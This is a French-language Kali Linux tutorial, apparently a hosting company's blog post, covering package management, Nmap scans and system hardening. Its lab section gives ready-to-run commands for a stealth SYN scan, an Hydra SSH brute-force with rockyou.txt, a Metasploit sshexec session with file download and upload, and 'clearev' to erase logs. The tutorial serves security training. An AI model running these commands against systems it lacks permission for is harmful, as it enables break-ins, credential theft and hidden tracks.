Tutoriel Kali Linux : Commandes essentielles, gestion des outils Kali, exécution de scans

Tutoriel Kali Linux : Commandes essentielles, gestion des outils Kali, exécution de scans

En tant que système d’exploitation axé sur la sécurité, Kali Linux vous permet d’effectuer diverses tâches, telles que les tests de pénétration, la criminalistique numérique et l’analyse de réseau. Avec des centaines d’outils de sécurité, Kali Linux est idéal pour les spécialistes de la cybersécurité et les passionnés qui cherchent à élargir leurs compétences.

Si vous souhaitez utiliser Kali Linux mais ne savez pas par où commencer, vous êtes au bon endroit. Dans cet article, vous apprendrez à exécuter Kali Linux sur un serveur privé virtuel (VPS), à explorer ses commandes essentielles et à gérer ses puissants outils.

Vous aurez également l’occasion d’acquérir une expérience pratique en menant des évaluations de sécurité, depuis l’exécution d’analyses de réseau jusqu’à l’exploitation des vulnérabilités sur les systèmes cibles. À la fin de ce guide, vous serez prêt à utiliser Kali Linux pour tester et protéger votre environnement en toute confiance.

Accéder à Kali Linux

La première étape pour démarrer avec Kali Linux dépend de l’endroit où vous l’avez installé. Par exemple, si vous avez installé Kali Linux sur un ordinateur de bureau, il vous suffit d’allumer l’appareil et de vous connecter directement. En revanche, si vous avez installé le système d’exploitation sur le VPS d’Hostinger, suivez plutôt les étapes suivantes :

  1. Connectez-vous à hPanel avec votre compte Hostinger et naviguez vers VPS → Gérer.
  2. Dans le tableau de bord de votre VPS, sélectionnez l’onglet Accès SSH pour afficher vos détails de connexion.
  1. Ouvrez votre terminal et exécutez la commande suivante, en remplaçant votre_adresse_ip_vps par l’adresse IP réelle de votre VPS :
ssh root@votre_adresse_ip_vps

Vous pouvez également cliquer sur le bouton Terminal de navigateur pour accéder directement à votre VPS sans utiliser d’autre application.

  1. Vous serez invité à saisir votre mot de passe. Saisissez-le soigneusement et appuyez sur Entrée.

Une fois authentifié, vous avez accès en ligne de commande à l’environnement Kali Linux sur votre VPS.

Commandes essentielles de Kali Linux

Kali Linux partage les mêmes commandes que les autres distributions Linux pour la navigation, la manipulation de fichiers et la surveillance du système. En tant que distribution basée sur Debian, elle utilise également des commandes de gestion de paquets similaires à celles d’Ubuntu et d’autres dérivés, notamment :

  • apt update – met à jour la liste des paquets disponibles.
  • apt upgrade – met à jour tous les paquets installés.
  • apt install [nom_du_paquet] – installe un paquet spécifique.
  • apt remove [nom_du_paquet] – désinstalle un paquet.

Comme Kali Linux comprend des outils de test de sécurité spécialisés, vous voudrez les explorer au fil du temps. Voici quelques commandes essentielles pour utiliser ces outils :

OutilCommandeUtilisation
Nmapnmap [ip_cible]Analyse les réseaux, les hôtes et les services.
MetasploitmsfconsoleLance la console Metasploit pour exploiter les vulnérabilités du système.
Aircrack-ngaircrack-ng [options]Effectue des tests de sécurité Wi-Fi.
WiresharkwiresharkAnalyse le trafic réseau.
Hydrahydra [options]Effectue des attaques par force brute sur les identifiants pour tester la robustesse des mots de passe.
John the Ripperjohn [file]Craque les hachages de mots de passe.
Niktonikto -h [ip_cible]Scanne les serveurs web pour trouver les vulnérabilités.
SQLmapsqlmap [options]Teste les bases de données pour les vulnérabilités d’injection SQL.
Lynislynis audit systemVérifie les configurations de sécurité du système.
Snortsnort [options]Surveille le trafic réseau pour détecter toute activité suspecte.

Pour travailler plus efficacement sous Kali Linux, pensez à apprendre ces raccourcis de ligne de commande utiles :

  • history – liste les commandes récentes pour faciliter leur réutilisation.
  • ![number] – réexécute une commande en fonction de son numéro dans la liste historique.
  • clear – efface l’écran du terminal.
  • –help – fournit des informations sur l’utilisation de la plupart des commandes.

Gérer les outils Kali

Kali Linux utilise des métapaquets pour installer des groupes d’outils liés pour des tâches de sécurité spécifiques. Si vous avez besoin de Kali Linux pour une tâche particulière, vous pouvez installer un métapaquet adapté à cette tâche au lieu d’installer l’ensemble des outils.

Lorsque vous avez installé Kali Linux sur votre VPS, vous n’avez reçu que le paquet kali-linux-core contenant les outils essentiels. Pour vérifier quels métapaquets et outils sont déjà installés, exécutez :

apt list --installed | grep kali

Voici le résultat attendu :

Si vous souhaitez installer des paquets supplémentaires, mettez d’abord à jour le système afin de maintenir la compatibilité et d’éviter les problèmes de dépendance :

sudo apt update

sudo apt -y full-upgrade

Ensuite, installez le métapaquet de votre choix. Dans cet exemple, nous utiliserons kali-linux-default, qui comprend divers outils populaires Kali Linux :

sudo apt install -y kali-linux default

Vous pouvez également installer d’autres métapaquets en fonction de vos besoins. Voici quelques options :

  • kali-linux-headless – outils de base sans interface graphique, idéal pour les configurations VPS.
  • kali-linux-arm – outils optimisés pour les appareils basés sur ARM.
  • kali-linux-nethunter – pour les tests de pénétration mobiles.
  • kali-tools-information-gathering – pour collecter des données sur les cibles.
  • kali-tools-vulnerability – pour détecter et analyser les vulnérabilités.
  • kali-tools-web – pour les tests de sécurité des applications web.
  • kali-tools-passwords – pour tester et craquer les mots de passe.
  • kali-tools-database – pour évaluer la sécurité des bases de données.
  • kali-tools-wireless – pour tester la sécurité des réseaux sans fil.
  • kali-tools-reverse-engineering – pour déconstruire et analyser les logiciels malveillants.
  • kali-tools-exploitation – pour exploiter les vulnérabilités du système.
  • kali-tools-social-engineering – pour les scénarios d’ingénierie sociale.
  • kali-tools-sniffing-spoofing – pour détecter et imiter un trafic réseau suspect.
  • kali-tools-post-exploitation – pour sécuriser l’accès après l’exploitation.
  • kali-tools-forensics – pour la criminalistique numérique et les enquêtes.
  • kali-tools-reporting – pour documenter et rapporter les résultats.

Si vous préférez, vous pouvez également installer des outils individuels. Par exemple :

sudo apt install nmap

Inversement, si vous trouvez certains outils inutiles et que vous souhaitez libérer de l’espace, vous pouvez les supprimer individuellement :

sudo apt remove [nom_de_l'outil]

Ou, si vous n’avez plus besoin d’un métapaquet entier, supprimez-le avec :

sudo apt remove [nom_du_métapaquet]

Utiliser Kali Linux pour les tests de sécurité

Cette section montre comment effectuer des tests de sécurité en utilisant notre VPS Kali Linux comme machine d’attaque et un autre VPS avec Ubuntu 24.04 comme système cible.

Pour les deux serveurs, nous utilisons des plans du VPS de Hostinger.

Pour la machine d’attaque, nous avons choisi le plan KVM 1, qui offre 4 Go de RAM et 50 Go de stockage NVMe pour €5.49/mois – ce qui répond aux exigences minimales de Kali Linux.

En ce qui concerne le système cible, vous pouvez choisir n’importe quel plan, mais nous avons décidé d’utiliser le même plan KVM 1.

Avertissement ! Assurez-vous toujours que vous avez la permission de tester un serveur ou un réseau. Les tests non autorisés sont illégaux et contraires à l'éthique. Dans notre cas, nous pouvons pratiquer librement puisque nous possédons les deux instances VPS.

Exécuter des analyses de réseau avec Nmap

Nmap est un outil de scan de réseau pour l’évaluation des vulnérabilités. Puisque vous utilisez deux serveurs distincts comme machine d’attaque et système cible, vous êtes parfaitement préparé pour la découverte et la cartographie du réseau à l’aide de Nmap. Voici comment procéder :

Scan de base de Nmap

Pour commencer par un simple scan, exécutez :

nmap [ip_cible]

Remplacez [ip_cible] par l’adresse IP de votre VPS cible. Pour les utilisateurs de Hostinger, vous pouvez trouver l’IP du serveur dans hPanel en naviguant vers VPS → Gérer → Informations VPS.

Lorsqu’elle est exécutée, cette commande

  • Découvre les ports ouverts sur la cible.
  • Identifie les services actifs.
  • Fournit des informations préliminaires sur les services.

Détection des services et des versions

Pour obtenir des informations supplémentaires sur les services fonctionnant sur des ports ouverts, procédez comme suit :

nmap -sV [ip_cible]

Cette commande active la détection de la version pour chaque service, ce qui vous aide à identifier les éventuelles vulnérabilités dans des versions spécifiques de logiciels.

Détection du système d’exploitation

Pour déterminer le système d’exploitation en cours d’exécution sur la cible, exécutez :

nmap -O [ip_cible]

L’option -O active la détection du système d’exploitation, qui devine le système d’exploitation en se basant sur les réponses de la cible. N’oubliez pas que Nmap ne devine pas toujours correctement, car il ne fournit qu’un pourcentage de probabilité pour chaque système d’exploitation correspondant.

Scan complet avec service, système d’exploitation et timing agressif

Pour une analyse approfondie qui inclut les ports courants, les services en cours d’exécution et la détection du système d’exploitation, exécutez :

nmap -A [ip_cible]

Cette commande est plus agressive : elle envoie des paquets plus personnalisés, appelés sondes, afin de recueillir des informations susceptibles de déclencher des pare-feux ou des systèmes de détection d’intrusion.

L’option -A permet :

  • La détection du système d’exploitation.
  • La détection de version.
  • L’analyse des scripts.
  • Le Traceroute.

Scan furtif pour éviter la détection

En revanche, si vous préférez une analyse subtile moins susceptible d’être détectée par les pare-feu ou les systèmes de détection d’intrusion, essayez un scan TCP SYN :

nmap -sS [ip_cible]

L’option -sS effectue un scan SYN, également appelé scan “semi-ouvert”, qui n’établit pas complètement une connexion TCP, ce qui réduit le risque de déclencher des alarmes.

Scan des ports spécifiques

Vous pouvez spécifier une plage si vous ne devez scanner que certains ports. Par exemple :

nmap -p 1-100 [ip_cible]

Cette fonction permet de scanner uniquement les ports 1 à 100. Ajustez la plage si nécessaire pour gagner du temps.

Sauvegarde des résultats du scan

Vous pouvez enregistrer les résultats du scan dans des fichiers pour une analyse ultérieure :

  • Sortie normale, utile pour les examens rapides :
nmap -oN scan_results.txt [ip_cible]
  • Format XML, idéal pour importer les résultats dans d’autres outils :
nmap -oX scan_results.xml [ip_cible]

Effectuer des attaques par force brute sur les identifiants de connexion avec Hydra

Vous pouvez également utiliser Kali Linux pour tester les identifiants de connexion à l’aide de Hydra. Il s’agit d’un puissant outil de craquage de mots de passe qui fonctionne sur différents protocoles, notamment SSH, FTP et HTTP.

Veuillez noter que vous devez connaître le nom d’utilisateur de votre cible pour utiliser Hydra de manière efficace. Dans notre cas, le nom d’utilisateur par défaut est root. Suivez les étapes suivantes :

Extraire la liste de mots

Une liste de mots (wordlist) est importante pour Hydra car il essaie de trouver chaque mot de passe de la liste jusqu’à ce qu’il trouve une correspondance. Kali Linux inclut une liste de mots populaire, rockyou.txt, que vous pouvez trouver à l’adresse suivante :

/usr/share/wordlists/rockyou.txt.gz

Si le fichier rockyou.txt.gz est présent, extrayez-le avec :

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

Cela créera le fichier rockyou.txt dans le même répertoire.

Cependant, si le fichier rockyou.txt.gz est manquant, vous devez installer le paquet wordlists :

sudo apt update

sudo apt install wordlists

Cela devrait installer le fichier rockyou.txt.gz, et vous pourrez ensuite l’extraire comme expliqué précédemment.

Vous pouvez également créer votre propre wordlist si vous souhaitez un ensemble de mots de passe plus restreint et plus ciblé.

Exécuter Hydra

Maintenant que tout est prêt, utilisez la commande suivante pour effectuer une attaque par force brute des connexions SSH sur votre VPS cible :

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://[ip_cible]

Dans cette commande, remplacer :

  • root – le nom d’utilisateur que vous souhaitez tester.
  • /usr/share/wordlists/rockyou.txt – le chemin vers votre wordlist personnalisée si vous en utilisez une.
  • [ip_cible] – l’adresse IP de votre VPS cible.

Interpréter les résultats

Hydra commence à tester chaque mot de passe de la liste. En cas de tentative réussie, Hydra l’affiche dans le terminal, en indiquant le mot de passe correct. Par exemple :

N’oubliez pas que le brute-forcing peut prendre de quelques minutes à plusieurs jours, en fonction de la taille de votre liste de mots et de la complexité du mot de passe cible.

Exploiter des systèmes cibles avec Metasploit

Outil de test de pénétration très répandu, Metasploit Framework propose des modules permettant d’exploiter les vulnérabilités, de tester la sécurité, de délivrer des charges utiles et de maintenir l’accès aux systèmes cibles.

Voici comment démarrer avec Metasploit :

Lancer Metasploit

Ouvrez Metasploit en tapant :

msfconsole

La console Metasploit s’affiche alors, vous permettant de rechercher et d’exécuter des exploits et des charges utiles.

Recherche d’un exploit

En vous basant sur ce que vous avez découvert avec Nmap, comme les ports et les services ouverts, recherchez les exploits pertinents dans Metasploit. Par exemple, si votre cible a un service SSH en cours d’exécution, recherchez les exploits liés à SSH :

search ssh

Metasploit vous renverra une liste d’exploits correspondants que vous pourrez utiliser.

Sélectionner et mettre en place un exploit

Choisissez un exploit dans la liste. Pour cet exemple, nous utiliserons sshexec, un module qui exécute des commandes sur un système cible via SSH. Ce module n’est pas techniquement un exploit au sens traditionnel du terme ; il s’agit d’un outil de post-authentification qui nécessite des informations d’identification SSH valides.

Puisque nous connaissons déjà le mot de passe de la cible après avoir fait du brute-forcing avec Hydra, nous pouvons utiliser ce module pour interagir avec la cible. Bien que cela soit similaire à une connexion directe via un terminal, l’utilisation de sshexec ajoute plus de flexibilité car il offre des fonctionnalités de post-exploitation.

Chargez le module sshexec :

use exploit/multi/ssh/sshexec

Après avoir chargé l’exploit, vérifiez les options requises :

show options

Faites attention aux champs obligatoires dont les valeurs sont vides, ce qui indique que vous devez les définir manuellement. Dans notre cas, nous devons définir l’IP cible et le mot de passe :

set RHOSTS [ip_cible]

set PASSWORD [mot-de-passe-cible]

Interagir avec la cible

Une fois que tout est configuré, exécutez l’exploit :

run

Cette commande ouvre une session Meterpreter, qui offre un contrôle puissant sur le système cible. Pour comprendre l’environnement dans lequel vous travaillez, commencez par ces commandes :

  • Vérifier les informations sur le système :
sysinfo
  • Vérifier l’utilisateur actuel :
getuid

Comme pour la navigation sur votre serveur, Meterpreter fournit des commandes pour interagir avec le système de fichiers de la cible :

  • Lister les fichiers du répertoire actuel :
ls
  • Changer de répertoire :
cd /chemin/vers/répertoire
  • Télécharger un fichier de la cible vers votre système local :
download /chemin/vers/fichier/cible
  • Téléverser un fichier vers le système cible, tel qu’un script ou un utilitaire :
upload /chemin/vers/fichier/local

Vous pouvez également obtenir des détails sur les connexions et les interfaces réseau de la cible :

  • Afficher les interfaces réseau :
ifconfig
  • Vérifier les connexions réseau actives :
netstat

Lorsque vous avez terminé, n’oubliez pas de nettoyer pour éviter de laisser des traces :

clearev

Ensuite, quittez la session Meterpreter en cliquant sur :

exit

Sécuriser Kali Linux

L’utilisation de Kali Linux pour des tâches de sécurité signifie que vous devez donner la priorité à la sécurisation de votre propre système, car un système compromis pourrait exposer des données sensibles, perturber votre travail ou même être utilisé pour lancer des attaques contre d’autres personnes.

Kali Linux suit les meilleures pratiques de sécurité des VPS Linux, telles que :

Mise à jour régulière

La mise à jour de Kali Linux est l’un des moyens les plus efficaces de le sécuriser :

sudo apt update && sudo apt -y upgrade

Cela permet de s’assurer que vous disposez des derniers correctifs de sécurité pour Kali Linux et tous les outils installés.

Désactiver la connexion root

Se connecter en tant que root via SSH est risqué. Créez plutôt un utilisateur distinct disposant des privilèges sudo :

sudo adduser <nouvel_utilisateur>

sudo usermod -aG sudo <nouvel_utilisateur>

Modifiez ensuite le fichier de configuration SSH :

sudo nano /etc/ssh/sshd_config

Recherchez la ligne PermitRootLogin et définissez-la sur no pour désactiver l’accès direct à la racine via SSH. Enregistrez le fichier, puis redémarrez le service SSH :

sudo systemctl restart ssh

Utiliser un pare-feu

Un pare-feu limite l’accès à votre VPS et bloque le trafic indésirable. Comme d’autres distributions, Kali Linux prend en charge le pare-feu non compliqué (UFW) qui est simple à configurer.

Installer et activer l’UFW :

sudo apt install ufw

sudo ufw enable

N’autorisez que les services essentiels, tels que SSH, sur votre port personnalisé :

sudo ufw allow 2222/tcp

Vous pouvez ajuster les règles en fonction des autres services que vous prévoyez d’exécuter. Une fois cela fait, vérifiez l’état du pare-feu :

sudo ufw status

Installer Fail2Ban

Fail2Ban surveille les journaux et bloque automatiquement les adresses IP ayant une activité suspecte, comme des tentatives de connexion échouées à plusieurs reprises. Installez-le avec :

sudo apt install fail2ban

Fail2Ban est configuré par défaut pour protéger SSH, mais vous pouvez ajuster ses paramètres dans /etc/fail2ban/jail.conf pour surveiller d’autres services. Redémarrez Fail2Ban après avoir effectué les modifications :

sudo systemctl restart fail2ban

Limiter les autorisations sudo

Pour tous les utilisateurs supplémentaires que vous ajoutez, limitez leurs privilèges sudo aux seules commandes nécessaires. Utilisez la commande visudo pour configurer soigneusement les autorisations sudo :

sudo visudo

Cela vous permet de spécifier strictement les commandes que chaque utilisateur peut exécuter avec sudo.

Conclusion

Dans ce tutoriel, nous avons abordé les principes fondamentaux de l’utilisation de Kali Linux à des fins de sécurité. Nous avons décrit comment accéder à votre environnement Kali Linux, exécuter les commandes essentielles, gérer les outils spécialisés et effectuer des évaluations à l’aide de Nmap, Hydra et Metasploit.

Nous avons également souligné l’importance de sécuriser votre propre système Kali Linux en effectuant des mises à jour régulières, en désactivant le login root et en configurant des outils tels qu’un pare-feu et Fail2Ban.

Kali Linux dispose de centaines d’outils pour les tests de pénétration, l’évaluation des vulnérabilités et la découverte de réseaux. Continuez à explorer ses capacités pour approfondir vos compétences en cybersécurité. Si vous avez des questions ou souhaitez partager votre expérience avec Kali Linux, n’hésitez pas à utiliser la section de commentaires ci-dessous.

Tutoriel Kali Linux – FAQ

Comment lancer un scan du réseau avec Kali Linux ?

Utilisez Nmap pour effectuer un scan du réseau. Exécutez nmap [ip_cible] pour découvrir les ports ouverts et les services actifs. Pour la détection des services, exécutez nmap -sV [ip_cible], qui détaille les versions exécutées sur les ports ouverts.

Puis-je exécuter des applications graphiques sur Kali Linux ?

Oui, vous pouvez exécuter des applications graphiques en installant Kali Linux sur un ordinateur de bureau ou en le configurant comme une machine virtuelle à l’aide de VirtualBox. Si vous installez Kali Linux sur un VPS, activez l’accès graphique via la redirection X11 ou configurez un serveur VNC avec un environnement de bureau léger comme XFCE.

Comment automatiser des tâches sur Kali Linux ?

Automatisez les tâches dans Kali Linux en utilisant de simples scripts bash pour les commandes répétitives. Planifiez-les avec cron en éditant le fichier crontab (crontab -e) pour définir des temps d’exécution afin que vos scripts s’exécutent automatiquement à des intervalles spécifiés.

Author
L'auteur

Chaimaa Chakir

Chaimaa est une spécialiste du référencement et du marketing de contenu chez Hostinger. Elle est passionnée par le marketing digital et la technologie. Elle espère aider les gens à résoudre leurs problèmes et à réussir en ligne. Chaimaa est une cinéphile qui adore les chats et l'analyse des films.